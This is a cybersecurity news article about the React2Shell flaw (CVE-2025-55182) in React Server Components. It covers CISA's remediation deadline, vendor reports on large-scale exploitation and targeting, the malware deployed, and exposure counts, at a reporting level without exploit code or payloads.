The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has directed federal agencies to remediate the recent React2Shell vulnerability by December 12, 2025, in response to active, large‑scale exploitation.

The critical vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), affects the React Server Components (RSC) Flight protocol. The weakness stems from unsafe deserialization that enables an attacker to inject malicious logic that the server runs with elevated privileges. The issue also impacts other frameworks, including Next.js, Waku, Vite, React Router, and RedwoodSDK.

“A single, specially crafted HTTP request is sufficient; there is no authentication requirement, user interaction, or elevated permissions involved,” Cloudforce One, Cloudflare’s threat intelligence team, said. “Once successful, the attacker can execute arbitrary, privileged JavaScript on the affected server.”

Since its public disclosure on December 3, 2025, the flaw has been leveraged by multiple threat actors across different campaigns for reconnaissance, initial access, and delivery of numerous malware families.

The development led CISA to add the bug to its Known Exploited Vulnerabilities catalog last Friday, initially setting December 26 as the remediation deadline for federal agencies. The deadline has since been accelerated to December 12, 2025, underscoring the operational impact and threat level.

Cloud security company Wiz reported a “rapid wave of opportunistic exploitation” of the vulnerability, with most activity focusing on internet-facing Next.js applications and other containerized workloads running in Kubernetes and managed cloud environments.

Image Source: Cloudflare

Cloudflare, which is also monitoring exploitation patterns, noted that threat actors are using internet-wide scanning and asset discovery platforms to enumerate exposed systems running React and Next.js applications. In some cases, reconnaissance activity has deliberately excluded Chinese IP address ranges from targeting.

“Their highest-density probing occurred against networks in Taiwan, Xinjiang Uyghur, Vietnam, Japan, and New Zealand – regions frequently associated with geopolitical intelligence collection priorities,” the web infrastructure company said.

The same activity has also selectively focused on government (.gov) domains, academic research organizations, and critical‑infrastructure entities. Among those probed was a national authority overseeing the import and export of uranium, rare metals, and nuclear fuel.

Some of the other notable findings are listed below –

• Prioritizing high‑sensitivity technology assets such as enterprise password managers and secure‑vault offerings, likely to enable downstream supply chain compromises
• Targeting edge‑exposed SSL VPN appliances whose administrative interfaces may embed React-based components
• Initial scanning and exploitation traffic observed from IP ranges historically linked to Asia-affiliated threat clusters

In its own honeypot-based analysis, Kaspersky stated it registered over 35,000 exploitation attempts in a single day on December 10, 2025. Typical attack chains started with basic system reconnaissance (e.g., `whoami`), followed by deployment of cryptocurrency miners or botnet malware such as Mirai/Gafgyt variants and RondoDox.

Some of the additional payloads observed in the wild include Cobalt Strike beacons, Sliver, Fast Reverse Proxy (FRP), a monitoring utility called Nezha, a Node.js payload that exfiltrates sensitive files and abuses TruffleHog and Gitleaks to harvest secrets, and a Go-based backdoor offering reverse shell, reconnaissance, and command-and-control (C2) functions.

In parallel, React2Shell has led to the publication of over 140 in-the-wild proof-of-concept exploits of mixed quality, with roughly half of them broken, inaccurate, or otherwise non-functional, according to VulnCheck. The usable exploit repositories often implement logic to deploy in-memory web shells like Godzilla, scan for vulnerable instances, and in some cases install a lightweight web application firewall (WAF) to filter competing malicious traffic.

Security researcher Rakesh Krishnan has also identified an open directory hosted on “154.61.77[.]105:8082” that contains a proof-of-concept (PoC) exploit script for CVE-2025–55182 along with two additional files –

• “domains.txt,” listing 35,423 domains
• “next_target.txt,” listing 596 URLs, including organizations such as Dia Browser, Starbucks, Porsche, and Lululemon

Analysis suggests the unknown threat actor is continuously scanning the internet against targets enumerated in the second file, compromising hundreds of pages as the list is updated.

Cybersecurity and cyber insurance provider Coalition has compared React2Shell to the 2021 Log4Shell vulnerability (CVE-2021-44228), characterizing it as a “systemic cyber risk aggregation event.”

According to recent data from The Shadowserver Foundation, there are more than 137,200 internet-exposed IP addresses running vulnerable code as of December 11, 2025. Of these, over 88,900 instances are located in the U.S., followed by Germany (10,900), France (5,500), and India (3,600).

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.